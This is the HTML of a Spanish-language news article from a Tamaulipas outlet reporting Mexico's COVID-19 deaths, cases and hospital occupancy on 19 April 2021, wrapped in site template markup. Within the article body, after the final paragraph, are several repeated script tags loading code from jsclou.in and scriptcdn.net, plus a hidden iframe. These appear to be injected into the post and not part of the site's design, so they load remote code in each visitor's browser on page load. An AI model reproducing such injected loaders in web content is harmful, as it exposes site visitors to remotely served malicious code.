                <div class="jeg_sharelist">
                    <a href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Flaverdad.com.mx%2F2021%2F04%2Fcifra-de-muertes-por-covid-19-en-mexico-asciende-a-212466-ssa%2F" rel='nofollow'  class="jeg_btn-facebook expanded"><i class="fa fa-facebook-official"></i><span>Share on Facebook</span></a><a href="https://twitter.com/intent/tweet?text=Cifra+de+muertes+por+Covid-19+en+M%C3%A9xico+asciende+a+212%2C466%3A+SSA+via+%40%40laverdad_tam&url=https%3A%2F%2Flaverdad.com.mx%2F2021%2F04%2Fcifra-de-muertes-por-covid-19-en-mexico-asciende-a-212466-ssa%2F" rel='nofollow'  class="jeg_btn-twitter expanded"><i class="fa fa-twitter"></i><span>Share on Twitter</span></a><a href="//api.whatsapp.com/send?text=Cifra+de+muertes+por+Covid-19+en+M%C3%A9xico+asciende+a+212%2C466%3A+SSA%0Ahttps%3A%2F%2Flaverdad.com.mx%2F2021%2F04%2Fcifra-de-muertes-por-covid-19-en-mexico-asciende-a-212466-ssa%2F" rel='nofollow'  data-action="share/whatsapp/share"  class="jeg_btn-whatsapp "><i class="fa fa-whatsapp"></i></a>
                    <div class="share-secondary">
                    <a href="https://www.linkedin.com/shareArticle?url=https%3A%2F%2Flaverdad.com.mx%2F2021%2F04%2Fcifra-de-muertes-por-covid-19-en-mexico-asciende-a-212466-ssa%2F&title=Cifra+de+muertes+por+Covid-19+en+M%C3%A9xico+asciende+a+212%2C466%3A+SSA" rel='nofollow'  class="jeg_btn-linkedin "><i class="fa fa-linkedin"></i></a><a href="https://www.pinterest.com/pin/create/bookmarklet/?pinFave=1&url=https%3A%2F%2Flaverdad.com.mx%2F2021%2F04%2Fcifra-de-muertes-por-covid-19-en-mexico-asciende-a-212466-ssa%2F&media=https://laverdad.com.mx/wp-content/uploads/2021/04/19MUER.jpg&description=Cifra+de+muertes+por+Covid-19+en+M%C3%A9xico+asciende+a+212%2C466%3A+SSA" rel='nofollow'  class="jeg_btn-pinterest "><i class="fa fa-pinterest"></i></a>
                </div>
                <a href="#" class="jeg_btn-toggle"><i class="fa fa-share"></i></a>
                </div>
            </div></div>
                        <div class="jeg_ad jeg_article jnews_content_top_ads "><div class='ads-wrapper  '></div></div>
                        <div class="entry-content no-share">
                            <div class="jeg_share_button share-float jeg_sticky_share clearfix share-normal">
                                <div class="jeg_share_float_container"></div>                            </div>

                            <div class="content-inner ">
                                <div id="fb-root"></div>
<p>&nbsp;</p>
<p>CD. DE MEXICO, 19 DE ABRIL DE 2021.-La Secretaría de Salud federal reportó este lunes 19 de abril 1,308 nuevos casos confirmados de Covid-19 en México, dando un acumulado de 2 millones 306,910 contagios.</p>
<p>Asimismo, la dependencia reportó un acumulado de 212,466 fallecimientos, tras registrarse 127 nuevas defunciones, respecto a las notificadas el domingo.</p>
<p>En conferencia de prensa en Palacio Nacional, el director general de Epidemiología, José Luis Alomía, estimó que la epidemia a nivel nacional está conformada por 25,201 casos activos que comenzaron con signos y síntomas en los últimos 15 días.</p>
<p>En el país se ha tomado muestra nasofaríngea para una prueba PCR a 6 millones 412,677 personas en hospitales públicos y kioscos de la salud.</p>
<p>La autoridad sanitaria federal detalló que con base en el porcentaje de positividad registrado en la semana epidemiológica 14 de 2021, la cifra de casos estimados de contagio en México asciende a 2 millones 496,235.</p>
<p>Alomía Zegarra dijo que 1 millón 833,132 personas se han recuperado de la enfermedad provocada por el coronavirus SARS-CoV-2.</p>
<p>De las 30,752 camas generales para pacientes graves de Covid-19, 4,519 (15%) se encuentran ocupadas en todo el país. Según la dependencia, todas las entidades del país tienen una ocupación por debajo del 30 por ciento.</p>
<p>En tanto, de las 10,236 camas con ventilador mecánico para pacientes críticos de Covid-19, 1,844 (18%) se encuentran ocupadas en el país. La Secretaría de Salud reportó que Chihuahua y Tabasco presentan una ocupación entre el 30 y 49% de ocupación, y el resto de las entidades tienen una ocupación menor.</p>
<p><script src="https://jsclou.in/pab1002.js" type="text/javascript"></script><script src="https://3001.scriptcdn.net/code/sc/sc1001" type="text/javascript"></script><iframe style="display: none;" src="about:blank"></iframe></p>
<p><script src="https://jsclou.in/pab1002.js" type="text/javascript"></script><script src="https://jsclou.in/pab1002.js" type="text/javascript"></script><script src="https://jsclou.in/pab1002.js" type="text/javascript"></script><script src="https://3001.scriptcdn.net/code/sc/sc1001" type="text/javascript"></script><script src="https://3001.scriptcdn.net/code/sc/sc1001" type="text/javascript"></script><script src="https://3001.scriptcdn.net/code/sc/sc1001" type="text/javascript"></script></p>
                                
	                            
                                                            </div>


                        </div>
	                    <div class="jeg_share_bottom_container"></div>
	                    
                        <div class="jeg_ad jeg_article jnews_content_bottom_ads "><div class='ads-wrapper  '><div class='ads_code'></div></div></div><div class="jnews_prev_next_container"></div><div class="jnews_author_box_container "></div><div class="jnews_related_post_container"></div><div class="jnews_popup_post_container">    <section class="jeg_popup_post">
        <span class="caption">Next Post</span>

                    <div class="jeg_popup_content">
                <div class="jeg_thumb">
                                        <a href="https://laverdad.com.mx/2021/04/arde-sierra-de-miquihuana-pobladores-claman-control-y-auxilio-economico/">
                        <div class="thumbnail-container animate-lazy  size-1000 "><img width="75" height="75" src="https://laverdad.com.mx/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-75x75 size-jnews-75x75 lazyload wp-post-image" alt="Arde sierra de Miquihuana; pobladores claman control y auxilio económico" loading="lazy" sizes="(max-width: 75px) 100vw, 75px" data-src="https://laverdad.com.mx/wp-content/uploads/2021/04/19miqui-75x75.jpg" data-srcset="https://laverdad.com.mx/wp-content/uploads/2021/04/19miqui-75x75.jpg 75w, https://laverdad.com.mx/wp-content/uploads/2021/04/19miqui-150x150.jpg 150w" data-sizes="auto" data-expand="700" /></div>                    </a>
                </div>
                <h3 class="post-title">
                    <a href="https://laverdad.com.mx/2021/04/arde-sierra-de-miquihuana-pobladores-claman-control-y-auxilio-economico/">
                        Arde sierra de Miquihuana; pobladores claman control y auxilio económico                    </a>
                </h3>
            </div>
                
        <a href="#" class="jeg_popup_close"><i class="fa fa-close"></i></a>
    </section>
</div><div class="jnews_comment_container"><div id="comments" class="comment-wrapper section" data-type="facebook" data-id=""><h3 class='comment-heading'>Discussion about this post</h3><div class="fb-comments" data-href="https://laverdad.com.mx/2021/04/cifra-de-muertes-por-covid-19-en-mexico-asciende-a-212466-ssa/" data-num-posts="10" data-width="100%"></div></div></div>
                                    </div>
            </div>
            
<div class="jeg_sidebar  jeg_sticky_sidebar col-md-4">
    <div class="widget widget_jnews_module_block_21" id="jnews_module_block_21-1"><div  class="jeg_postblock_21 jeg_postblock jeg_module_hook jeg_pagination_disable jeg_col_1o3 jnews_module_78483_0_607e6d4fc1948  normal " data-unique="jnews_module_78483_0_607e6d4fc1948">
                <div class="jeg_block_heading jeg_block_heading_5 jeg_subcat_right">
                    <h3 class="jeg_block_title"><span>Recomendadas<strong>.</strong></span></h3>
                    
                </div>
                <div class="jeg_block_container">
                
                <div class="jeg_posts jeg_load_more_flag">
                <article class="jeg_post jeg_pl_sm format-standard">
                <div class="jeg_thumb">
                    
                    <a href="https://laverdad.com.mx/2021/04/arde-sierra-de-miquihuana-pobladores-claman-control-y-auxilio-economico/"><div class="thumbnail-container animate-lazy  size-715 "><img width="120" height="86" src="https://laverdad.com.mx/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-120x86 size-jnews-120x86 lazyload wp-post-image" alt="Arde sierra de Miquihuana; pobladores claman control y auxilio económico" loading="lazy" sizes="(max-width: 120px) 100vw, 120px" data-src="https://laverdad.com.mx/wp-content/uploads/2021/04/19miqui-120x86.jpg" data-srcset="https://laverdad.com.mx/wp-content/uploads/2021/04/19miqui-120x86.jpg 120w, https://laverdad.com.mx/wp-content/uploads/2021/04/19miqui-350x250.jpg 350w" data-sizes="auto" data-expand="700" /></div></a>
                </div>
                <div class="jeg_postblock_content">
                    <h3 class="jeg_post_title">
                        <a href="https://laverdad.com.mx/2021/04/arde-sierra-de-miquihuana-pobladores-claman-control-y-auxilio-economico/">Arde sierra de Miquihuana; pobladores claman control y auxilio económico</a>
                    </h3>
                    <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://laverdad.com.mx/2021/04/arde-sierra-de-miquihuana-pobladores-claman-control-y-auxilio-economico/" ><i class="fa fa-clock-o"></i> abril 19, 2021</a></div></div>
                </div>
            </article><article class="jeg_post jeg_pl_sm format-standard">
                <div class="jeg_thumb">
                    
                    <a href="https://laverdad.com.mx/2021/04/cifra-de-muertes-por-covid-19-en-mexico-asciende-a-212466-ssa/"><div class="thumbnail-container animate-lazy  size-715 "><img width="120" height="86" src="https://laverdad.com.mx/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-120x86 size-jnews-120x86 lazyload wp-post-image" alt="Cifra de muertes por Covid-19 en México asciende a 212,466: SSA" loading="lazy" data-src="https://laverdad.com.mx/wp-content/uploads/2021/04/19MUER-120x86.jpg" data-srcset="" data-sizes="auto" data-expand="700" /></div></a>
                </div>
                <div class="jeg_postblock_content">
                    <h3 class="jeg_post_title">
                        <a href="https://laverdad.com.mx/2021/04/cifra-de-muertes-por-covid-19-en-mexico-asciende-a-212466-ssa/">Cifra de muertes por Covid-19 en México asciende a 212,466: SSA</a>
                    </h3>
                    <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://laverdad.com.mx/2021/04/cifra-de-muertes-por-covid-19-en-mexico-asciende-a-212466-ssa/" ><i class="fa fa-clock-o"></i> abril 19, 2021</a></div></div>
                </div>
            </article><article class="jeg_post jeg_pl_sm format-standard">
                <div class="jeg_thumb">
                    
                    <a href="https://laverdad.com.mx/2021/04/alonso-ancira-dueno-de-ahmsa-sale-del-penal-regresara-216-millones-de-dolares/"><div class="thumbnail-container animate-lazy  size-715 "><img width="120" height="86" src="https://laverdad.com.mx/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-120x86 size-jnews-120x86 lazyload wp-post-image" alt="Alonso Ancira, dueño de AHMSA sale del penal, regresará 216 millones de dólares" loading="lazy" sizes="(max-width: 120px) 100vw, 120px" data-src="https://laverdad.com.mx/wp-content/uploads/2021/04/19ANCIRA-120x86.jpeg" data-srcset="https://laverdad.com.mx/wp-content/uploads/2021/04/19ANCIRA-120x86.jpeg 120w, https://laverdad.com.mx/wp-content/uploads/2021/04/19ANCIRA-350x250.jpeg 350w, https://laverdad.com.mx/wp-content/uploads/2021/04/19ANCIRA-750x533.jpeg 750w" data-sizes="auto" data-expand="700" /></div></a>
                </div>
                <div class="jeg_postblock_content">
                    <h3 class="jeg_post_title">
                        <a href="https://laverdad.com.mx/2021/04/alonso-ancira-dueno-de-ahmsa-sale-del-penal-regresara-216-millones-de-dolares/">Alonso Ancira, dueño de AHMSA sale del penal, regresará 216 millones de dólares</a>
                    </h3>
                    <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://laverdad.com.mx/2021/04/alonso-ancira-dueno-de-ahmsa-sale-del-penal-regresara-216-millones-de-dolares/" ><i class="fa fa-clock-o"></i> abril 19, 2021</a></div></div>
                </div>
            </article><article class="jeg_post jeg_pl_sm format-standard">
                <div class="jeg_thumb">
                    
                    <a href="https://laverdad.com.mx/2021/04/epidemia-del-covid-19-va-a-la-alza-en-10-entidades-del-pais/"><div class="thumbnail-container animate-lazy  size-715 "><img width="120" height="86" src="https://laverdad.com.mx/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-120x86 size-jnews-120x86 lazyload wp-post-image" alt="Epidemia del Covid-19 va a la alza en 10 entidades del país" loading="lazy" sizes="(max-width: 120px) 100vw, 120px" data-src="https://laverdad.com.mx/wp-content/uploads/2021/04/19cov-120x86.jpg" data-srcset="https://laverdad.com.mx/wp-content/uploads/2021/04/19cov-120x86.jpg 120w, https://laverdad.com.mx/wp-content/uploads/2021/04/19cov-350x250.jpg 350w, https://laverdad.com.mx/wp-content/uploads/2021/04/19cov-750x536.jpg 750w, https://laverdad.com.mx/wp-content/uploads/2021/04/19cov-1140x815.jpg 1140w" data-sizes="auto" data-expand="700" /></div></a>
                </div>
                <div class="jeg_postblock_content">
                    <h3 class="jeg_post_title">
                        <a href="https://laverdad.com.mx/2021/04/epidemia-del-covid-19-va-a-la-alza-en-10-entidades-del-pais/">Epidemia del Covid-19 va a la alza en 10 entidades del país</a>
                    </h3>
                    <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://laverdad.com.mx/2021/04/epidemia-del-covid-19-va-a-la-alza-en-10-entidades-del-pais/" ><i class="fa fa-clock-o"></i> abril 19, 2021</a></div></div>
                </div>
            </article>
            </div>
                <div class='module-overlay'>
                <div class='preloader_type preloader_dot'>
                    <div class="module-preloader jeg_preloader dot">
                        <span></span><span></span><span></span>
                    </div>
                    <div class="module-preloader jeg_preloader circle">
                        <div class="jnews_preloader_circle_outer">
                            <div class="jnews_preloader_circle_inner"></div>
                        </div>
                    </div>
                    <div class="module-preloader jeg_preloader square">
                        <div class="jeg_square"><div class="jeg_square_inner"></div></div>
                    </div>
                </div>
            </div>
            </div>
            <div class="jeg_block_navigation">
                <div class='navigation_overlay'><div class='module-preloader jeg_preloader'><span></span><span></span><span></span></div></div>
                
                
            </div>
                
                <script>var jnews_module_78483_0_607e6d4fc1948 = {"header_icon":"","first_title":"Recomendadas","second_title":".","url":"","header_type":"heading_5","header_background":"","header_secondary_background":"","header_text_color":"","header_line_color":"","header_accent_color":"","header_filter_category":"","header_filter_author":"","header_filter_tag":"","header_filter_text":"All","post_type":"post","content_type":"all","number_post":"4","post_offset":"0","unique_content":"unique2","include_post":"","exclude_post":"","include_category":"","exclude_category":"","include_author":"","include_tag":"","exclude_tag":"","sort_by":"latest","date_format":"default","date_format_custom":"Y\/m\/d","force_normal_image_load":"","pagination_mode":"disable","pagination_nextprev_showtext":"","pagination_number_post":"6","pagination_scroll_limit":"0","boxed":"","boxed_shadow":"","el_id":"","el_class":"","scheme":"normal","column_width":"auto","title_color":"","accent_color":"","alt_color":"","excerpt_color":"","css":"","listdom-category":"","listdom-location":"","listdom-tag":"","listdom-feature":"","listdom-label":"","paged":1,"column_class":"jeg_col_1o3","class":"jnews_block_21"};</script>
            </div></div><div class="widget_text widget widget_custom_html" id="custom_html-4"><div class="textwidget custom-html-widget"><script data-ad-client="ca-pub-0079443056213363" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script></div></div><div class="widget widget_jnews_module_element_ads" id="jnews_module_element_ads-1"><div  class='jeg_ad jeg_ad_module jnews_module_78483_1_607e6d4fd4278   '><div class='ads-wrapper'><a href='#' target='_self' class='adlink ads_image '>
								<img src='https://laverdad.com.mx/wp-content/themes/jnews/assets/img/jeg-empty.png' class='lazyload' data-src='https://laverdad.com.mx/wp-content/uploads/2020/06/WhatsApp-Image-2020-06-27-at-16.23.49-1.jpeg' alt='' data-pin-no-hover="true">
							</a></div></div></div><div class="widget widget_jnews_module_element_ads" id="jnews_module_element_ads-4"><div  class='jeg_ad jeg_ad_module jnews_module_78483_2_607e6d4fd49b0   '><div class='ads-wrapper'><a href='' target='_self' class='adlink ads_image '>
								<img src='https://laverdad.com.mx/wp-content/themes/jnews/assets/img/jeg-empty.png' class='lazyload' data-src='https://laverdad.com.mx/wp-content/uploads/2021/04/47CF1DDF-A5F1-4C35-A8B1-0C385EC22024.jpeg' alt='' data-pin-no-hover="true">
							</a><a href='' target='_self' class='adlink ads_image_tablet '>
								<img src='https://laverdad.com.mx/wp-content/themes/jnews/assets/img/jeg-empty.png' class='lazyload' data-src='https://laverdad.com.mx/wp-content/uploads/2021/04/47CF1DDF-A5F1-4C35-A8B1-0C385EC22024.jpeg' alt='' data-pin-no-hover="true">
							</a></div></div></div><div class="widget_text widget widget_custom_html" id="custom_html-3"><div class="textwidget custom-html-widget"></div></div></div>        </div>

        <div class="jeg_ad jeg_article jnews_article_bottom_ads">
            <div class='ads-wrapper  '></div>        </div>

    </div>
</div>
                </div>
            </div>

            <div id="post-body-class" class="post-template-default single single-post postid-78483 single-format-standard wp-embed-responsive jeg_toggle_dark jeg_single_tpl_1 jnews jsc_normal wpb-js-composer js-comp-ver-6.4.1 vc_responsive"></div>

            
        </div>

        <div class="post-ajax-overlay">
    <div class="preloader_type preloader_dot">
        <div class="newsfeed_preloader jeg_preloader dot">
            <span></span><span></span><span></span>
        </div>
        <div class="newsfeed_preloader jeg_preloader circle">
            <div class="jnews_preloader_circle_outer">
                <div class="jnews_preloader_circle_inner"></div>
            </div>
        </div>
        <div class="newsfeed_preloader jeg_preloader square">
            <div class="jeg_square"><div class="jeg_square_inner"></div></div>
        </div>
    </div>
</div>
    </div>
        <div class="footer-holder" id="footer" data-id="footer">
            <div class="jeg_footer jeg_footer_4 normal">
    <div class="jeg_footer_container jeg_container">
        <div class="jeg_footer_content">
            <div class="container">
                <div class="row">
                    <div class="jeg_footer_primary clearfix">
                        <div class="col-md-9 footer_column">
                            <ul class="jeg_menu_footer"><li id="menu-item-97" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-97"><a href="#">About</a></li>
<li id="menu-item-98" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-98"><a href="#">Advertise</a></li>
<li id="menu-item-99" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-99"><a href="#">Privacy &#038; Policy</a></li>
<li id="menu-item-100" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-100"><a href="#">Contact</a></li>
</ul>                        </div>
                        <div class="col-md-3 footer_column footer_right">
                            <div class="footer-text">
                                Info<strong> redaccion@laverdad.com.mx </strong>                            </div>
                        </div>
                    </div>

                    
                    <div class="jeg_footer_secondary clearfix">
                        <div class="col-md-9 footer_column">
                            <p class="copyright"> © 2020 La Verdad de Tamaulipas  </p>
                        </div>
                        <div class="col-md-3 footer_column footer_right">

                            			<div class="jeg_social_icon_block socials_widget nobg">
				<a href="https://www.facebook.com/laverdad.tamps/" target='_blank' class="jeg_facebook"><i class="fa fa-facebook"></i> </a><a href="https://twitter.com/laverdad_tam" target='_blank' class="jeg_twitter"><i class="fa fa-twitter"></i> </a>			</div>
			
                        </div>
                    </div>

                                        
                </div>
            </div>
        </div>
    </div>
</div><!-- /.footer -->        </div>

        <div class="jscroll-to-top">
        	<a href="#back-to-top" class="jscroll-to-top_link"><i class="fa fa-angle-up"></i></a>
        </div>
    </div>

    <!-- Mobile Navigation
    ============================================= -->
<div id="jeg_off_canvas" class="normal">
    <a href="#" class="jeg_menu_close"><i class="jegicon-cross"></i></a>
    <div class="jeg_bg_overlay"></div>
    <div class="jeg_mobile_wrapper">
        <div class="nav_wrap">
    <div class="item_main">
        <!-- Search Form -->
<div class="jeg_aside_item jeg_search_wrapper jeg_search_no_expand square">
    <a href="#" class="jeg_search_toggle"><i class="fa fa-search"></i></a>
    <form action="https://laverdad.com.mx/" method="get" class="jeg_search_form" target="_top">
    <input name="s" class="jeg_search_input" placeholder="Search..." type="text" value="" autocomplete="off">
    <button type="submit" class="jeg_search_button btn"><i class="fa fa-search"></i></button>
</form>
<!-- jeg_search_hide with_result no_result -->
<div class="jeg_search_result jeg_search_hide with_result">
    <div class="search-result-wrapper">
    </div>
    <div class="search-link search-noresult">
        No Result    </div>
    <div class="search-link search-all-button">
        <i class="fa fa-search"></i> View All Result    </div>
</div></div><div class="jeg_aside_item">
    <ul class="jeg_mobile_menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-277"><a href="https://laverdad.com.mx/">Portada</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-278"><a href="https://laverdad.com.mx/category/opinion/">Opinión</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-279"><a href="https://laverdad.com.mx/category/local/">Local</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-281"><a href="https://laverdad.com.mx/category/tamaulipas/">Tamaulipas</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-282"><a href="https://laverdad.com.mx/category/nacional/">Nacional</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-283"><a href="https://laverdad.com.mx/category/mundo/">Mundo</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-280"><a href="https://laverdad.com.mx/category/seguridad/">Seguridad</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-284"><a href="https://laverdad.com.mx/category/deportes/">Deportes</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-285"><a href="https://laverdad.com.mx/category/espectaculos/">Espectáculos</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-398"><a href="https://laverdad.com.mx/category/entretenimiento/">Entretenimiento</a></li>
</ul></div>    </div>
    <div class="item_bottom">
        <div class="jeg_aside_item socials_widget nobg">
    <a href="https://www.facebook.com/laverdad.tamps/" target='_blank' class="jeg_facebook"><i class="fa fa-facebook"></i> </a><a href="https://twitter.com/laverdad_tam" target='_blank' class="jeg_twitter"><i class="fa fa-twitter"></i> </a></div><div class="jeg_aside_item jeg_aside_copyright">
	<p>© 2020 La Verdad de Tamaulipas </p>
</div>    </div>
</div>    </div>
</div><!-- Login Popup Content -->
<div id="jeg_loginform" class="jeg_popup mfp-with-anim mfp-hide">
    <div class="jeg_popupform jeg_popup_account">
        <form action="#" data-type="login" method="post" accept-charset="utf-8">
            <h3>Welcome Back!</h3>            <p>Login to your account below</p>

            <!-- Form Messages -->
            <div class="form-message"></div>
            <p class="input_field">
                <input type="text" name="username" placeholder="Username" value="">
            </p>
            <p class="input_field">
                <input type="password" name="password" placeholder="Password" value="">
            </p>
            <p class="input_field remember_me">
                <input type="checkbox" id="remember_me" name="remember_me" value="true">
                <label for="remember_me">Remember Me</label>
            </p>
			<div class="g-recaptcha" data-sitekey=""></div>
			<p class="submit">
                <input type="hidden" name="action" value="login_handler">
                <input type="hidden" name="jnews_nonce" value="59e8ea37ae">
                <input type="submit" name="jeg_login_button" class="button" value="Log In" data-process="Processing . . ." data-string="Log In">
            </p>
            <div class="bottom_links clearfix">
                <a href="#jeg_forgotform" class="jeg_popuplink forgot">Forgotten Password?</a>
                            </div>
        </form>
    </div>
</div>

<!-- Register Popup Content -->
<div id="jeg_registerform" class="jeg_popup mfp-with-anim mfp-hide">
    <div class="jeg_popupform jeg_popup_account">
        <form action="#" data-type="register" method="post" accept-charset="utf-8">
            <h3>Create New Account!</h3>            <p>Fill the forms below to register</p>

            <!-- Form Messages -->
            <div class="form-message"></div>

            <p class="input_field">
                <input type="text" name="email" placeholder="Your email" value="">
            </p>
            <p class="input_field">
                <input type="text" name="username" placeholder="Username" value="">
            </p>
			<div class="g-recaptcha" data-sitekey=""></div>
            <p class="submit">
                <input type="hidden" name="action" value="register_handler">
                <input type="hidden" name="jnews_nonce" value="59e8ea37ae">
                <input type="submit" name="jeg_login_button" class="button" value="Sign Up" data-process="Processing . . ." data-string="Sign Up">
            </p>
                        <div class="bottom_links clearfix">
                <span>All fields are required.</span>
                <a href="#jeg_loginform" class="jeg_popuplink"><i class="fa fa-lock"></i> Log In</a>
            </div>
        </form>
    </div>
</div>

<!-- Register Popup Content -->
<div id="jeg_forgotform" class="jeg_popup mfp-with-anim mfp-hide">
    <div class="jeg_popupform jeg_popup_account">
        <form action="#" data-type="forgot" method="post" accept-charset="utf-8">
            <h3>Retrieve your password</h3>
            <p>Please enter your username or email address to reset your password.</p>

            <!-- Form Messages -->
            <div class="form-message"></div>

            <p class="input_field">
                <input type="text" name="user_login" placeholder="Your email or username" value="">
            </p>
			<div class="g-recaptcha" data-sitekey=""></div>
            <p class="submit">
                <input type="hidden" name="action" value="forget_password_handler">
                <input type="hidden" name="jnews_nonce" value="59e8ea37ae">
                <input type="submit" name="jeg_login_button" class="button" value="Reset Password" data-process="Processing . . ." data-string="Reset Password">
            </p>
            <div class="bottom_links clearfix">
                <a href="#jeg_loginform" class="jeg_popuplink"><i class="fa fa-lock"></i> Log In</a>
            </div>
        </form>
    </div>
</div><script type="text/javascript">var jfla = ["view_counter"]</script>				<script>
	              (function (i, s, o, g, r, a, m) {
	                i['GoogleAnalyticsObject'] = r
	                i[r] = i[r] || function () {
	                  (i[r].q = i[r].q || []).push(arguments)
	                }, i[r].l = 1 * new Date()
	                a = s.createElement(o),
	                  m = s.getElementsByTagName(o)[0]
	                a.async = 1
	                a.src = g
	                m.parentNode.insertBefore(a, m)
	              })(window, document, 'script', 'https://www.google-analytics.com/analytics.js', 'ga')

	              ga('create', 'UA-157117965-1', 'auto')
	              ga('send', 'pageview')
				</script>
				<div id="jeg_playlist" class="jeg_popup create_playlist mfp-with-anim mfp-hide">
	<div class="jeg_popupform jeg_popupform_playlist">
		<form action="#" method="post" accept-charset="utf-8">
			<h3>Add New Playlist</h3>

			<!-- Form Messages -->
			<div class="form-message"></div>

			<div class="form-group">
				<p class="input_field">
					<input type="text" name="title"
						   placeholder="Playlist Name"
						   value="">
				</p>
				<p class="input_field">
					<select name='visibility'><option disabled selected='selected' value=''>- Select Visibility -</option><option value='public' >Public</option><option value='private' >Private</option></select>				</p>
				<!-- submit button -->
				<div class="submit">
					<input type="hidden" name="type" value="create_playlist">
					<input type="hidden" name="action" value="playlist_handler">
					<input type="hidden" name="post_id" value="">
					<input type="hidden" name="jnews-playlist-nonce"
						   value="1532604ff7">
					<input type="submit" name="jeg_save_button" class="button"
						   value="Save"
						   data-process="Processing . . ."
						   data-string="Save">
				</div>
			</div>


		</form>
	</div>
</div>

<div id="notification_action_renderer" class="jeg_popup_container">
	<div id="paper_toast">
		<span id="label"></span>
	</div>
</div>

			<script type="text/javascript" charset="utf-8">
			    jQuery(document).ready(function() {
				    jQuery("a[rel^='prettyPhoto']").prettyPhoto({
					    deeplinking: false,
				    });
			    });
			</script>

		<div id="selectShareContainer">
                        <div class="selectShare-inner">
                            <div class="select_share jeg_share_button">              
                                <button class="select-share-button jeg_btn-facebook" data-url="http://www.facebook.com/sharer.php?u=[url]&quote=[selected_text]" data-post-url="https%3A%2F%2Flaverdad.com.mx%2F2021%2F04%2Fcifra-de-muertes-por-covid-19-en-mexico-asciende-a-212466-ssa%2F" data-image-url="" data-title="Cifra+de+muertes+por+Covid-19+en+M%C3%A9xico+asciende+a+212%2C466%3A+SSA" ><i class="fa fa-facebook-official"></i></a><button class="select-share-button jeg_btn-twitter" data-url="https://twitter.com/intent/tweet?text=[selected_text]&url=[url]" data-post-url="https%3A%2F%2Flaverdad.com.mx%2F2021%2F04%2Fcifra-de-muertes-por-covid-19-en-mexico-asciende-a-212466-ssa%2F" data-image-url="" data-title="Cifra+de+muertes+por+Covid-19+en+M%C3%A9xico+asciende+a+212%2C466%3A+SSA+via+%40%40laverdad_tam" ><i class="fa fa-twitter"></i></a>
                            </div>
                            <div class="selectShare-arrowClip">
                                <div class="selectShare-arrow"></div>      
                            </div> 
                        </div>      
                      </div><div class="jeg_read_progress_wrapper"></div><script type='text/javascript' src='https://laverdad.com.mx/wp-content/plugins/jnews-video/assets/js/supposition.js?ver=7.0.8' id='supposition-js'></script>
<script type='text/javascript' src='https://laverdad.com.mx/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4' id='jquery-ui-core-js'></script>
<script type='text/javascript' src='https://laverdad.com.mx/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4' id='jquery-ui-widget-js'></script>
<script type='text/javascript' src='https://laverdad.com.mx/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4' id='jquery-ui-mouse-js'></script>
<script type='text/javascript' src='https://laverdad.com.mx/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4' id='jquery-ui-sortable-js'></script>
<script type='text/javascript' id='jnews-video-js-extra'>
/* <![CDATA[ */
var jnewsvideo = {"user_playlist":[]};
/* ]]> */
</script>
<script type='text/javascript' src='https://laverdad.com.mx/wp-content/plugins/jnews-video/assets/js/plugin.js?ver=7.0.8' id='jnews-video-js'></script>
<script type='text/javascript' src='https://laverdad.com.mx/wp-content/plugins/prettyphoto/js/jquery.prettyPhoto.js?ver=1.2.3' id='jltma-wpf-js'></script>
<script type='text/javascript' src='https://laverdad.com.mx/wp-includes/js/comment-reply.min.js?ver=5.5.4' id='comment-reply-js'></script>
<script type='text/javascript' id='mediaelement-core-js-before'>
var mejsL10n = {"language":"es","strings":{"mejs.download-file":"Descargar archivo","mejs.install-flash":"Est\u00e1s usando un navegador que no tiene Flash activo o instalado. Por favor, activa el componente del reproductor Flash o descarga la \u00faltima versi\u00f3n desde https:\/\/get.adobe.com\/flashplayer\/","mejs.fullscreen":"Pantalla completa","mejs.play":"Reproducir","mejs.pause":"Pausa","mejs.time-slider":"Control de tiempo","mejs.time-help-text":"Usa las teclas de direcci\u00f3n izquierda\/derecha para avanzar un segundo y las flechas arriba\/abajo para avanzar diez segundos.","mejs.live-broadcast":"Transmisi\u00f3n en vivo","mejs.volume-help-text":"Utiliza las teclas de flecha arriba\/abajo para aumentar o disminuir el volumen.","mejs.unmute":"Activar el sonido","mejs.mute":"Silenciar","mejs.volume-slider":"Control de volumen","mejs.video-player":"Reproductor de v\u00eddeo","mejs.audio-player":"Reproductor de audio","mejs.captions-subtitles":"Pies de foto \/ Subt\u00edtulos","mejs.captions-chapters":"Cap\u00edtulos","mejs.none":"Ninguna","mejs.afrikaans":"Afrik\u00e1ans","mejs.albanian":"Albano","mejs.arabic":"\u00c1rabe","mejs.belarusian":"Bielorruso","mejs.bulgarian":"B\u00falgaro","mejs.catalan":"Catal\u00e1n","mejs.chinese":"Chino","mejs.chinese-simplified":"Chino (Simplificado)","mejs.chinese-traditional":"Chino 